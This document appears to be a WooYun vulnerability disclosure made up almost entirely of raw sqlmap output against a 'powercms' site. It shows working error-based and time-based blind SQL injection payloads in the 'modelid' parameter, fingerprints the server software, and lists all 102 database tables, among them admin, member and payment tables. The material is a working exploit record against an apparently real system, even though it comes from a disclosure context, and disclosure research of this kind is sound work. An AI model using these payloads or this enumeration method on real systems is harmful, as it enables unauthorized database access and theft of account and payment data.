WooYun.org

sqlmap identified the following injection points with a total of 305 HTTP(s) requests:
---
Place: GET
Parameter: modelid
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: modelid=1 AND (SELECT 5026 FROM(SELECT COUNT(*),CONCAT(0x71626c7871,(SELECT (CASE WHEN (5026=5026) THEN 1 ELSE 0 END)),0x71676b7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: modelid=1 AND SLEEP(30)
---
web server operating system: Linux CentOS 5.10
web application technology: Apache 2.2.3, PHP 5.1.6
back-end DBMS: MySQL 5.0
Database: powercms
[102 tables]
+------------------------------+
| powercms_admin               |
| powercms_admin_role          |
| powercms_admin_role_priv     |
| powercms_ads                 |
| powercms_ads_place           |
| powercms_ads_stat            |
| powercms_announce            |
| powercms_area                |
| powercms_attachment          |
| powercms_author              |
| powercms_block               |
| powercms_c_down              |
| powercms_c_info              |
| powercms_c_ku6video          |
| powercms_c_news              |
| powercms_c_picture           |
| powercms_c_product           |
| powercms_c_video             |
| powercms_cache_count         |
| powercms_category            |
| powercms_collect             |
| powercms_comment             |
| powercms_content             |
| powercms_content_count       |
| powercms_content_position    |
| powercms_content_tag         |
| powercms_copyfrom            |
| powercms_datasource          |
| powercms_editor_data         |
| powercms_guestbook           |
| powercms_hits                |
| powercms_ipbanned            |
| powercms_keylink             |
| powercms_keyword             |
| powercms_link                |
| powercms_log                 |
| powercms_mail                |
| powercms_mail_email          |
| powercms_mail_email_type     |
| powercms_map_centers         |
| powercms_map_points          |
| powercms_member              |
| powercms_member_cache        |
| powercms_member_company      |
| powercms_member_detail       |
| powercms_member_group        |
| powercms_member_group_extend |
| powercms_member_group_priv   |
| powercms_member_info         |
| powercms_menu                |
| powercms_menu_51net          |
| powercms_menu_copy           |
| powercms_message             |
| powercms_model               |
| powercms_model_field         |
| powercms_model_field_bak     |
| powercms_module              |
| powercms_order               |
| powercms_order_deliver       |
| powercms_order_log           |
| powercms_pay_card            |
| powercms_pay_exchange        |
| powercms_pay_payment         |
| powercms_pay_pointcard_type  |
| powercms_pay_stat            |
| powercms_pay_user_account    |
| powercms_player              |
| powercms_position            |
| powercms_process             |
| powercms_process_status      |
| powercms_role                |
| powercms_search              |
| powercms_search_type         |
| powercms_session             |
| powercms_status              |
| powercms_times               |
| powercms_type                |
| powercms_urlrule             |
| powercms_video               |
| powercms_video_count         |
| powercms_video_data          |
| powercms_video_position      |
| powercms_video_special       |
| powercms_video_special_list  |
| powercms_video_tag           |
| powercms_vote_data           |
| powercms_vote_option         |
| powercms_vote_subject        |
| powercms_vote_useroption     |
| powercms_workflow            |
| powercms_yp_apply            |
| powercms_yp_buy              |
| powercms_yp_cert             |
| powercms_yp_collect          |
| powercms_yp_count            |
| powercms_yp_guestbook        |
| powercms_yp_job              |
| powercms_yp_news             |
| powercms_yp_product          |
| powercms_yp_relation         |
| powercms_yp_stats            |
| powercms_yp_stock            |
+------------------------------+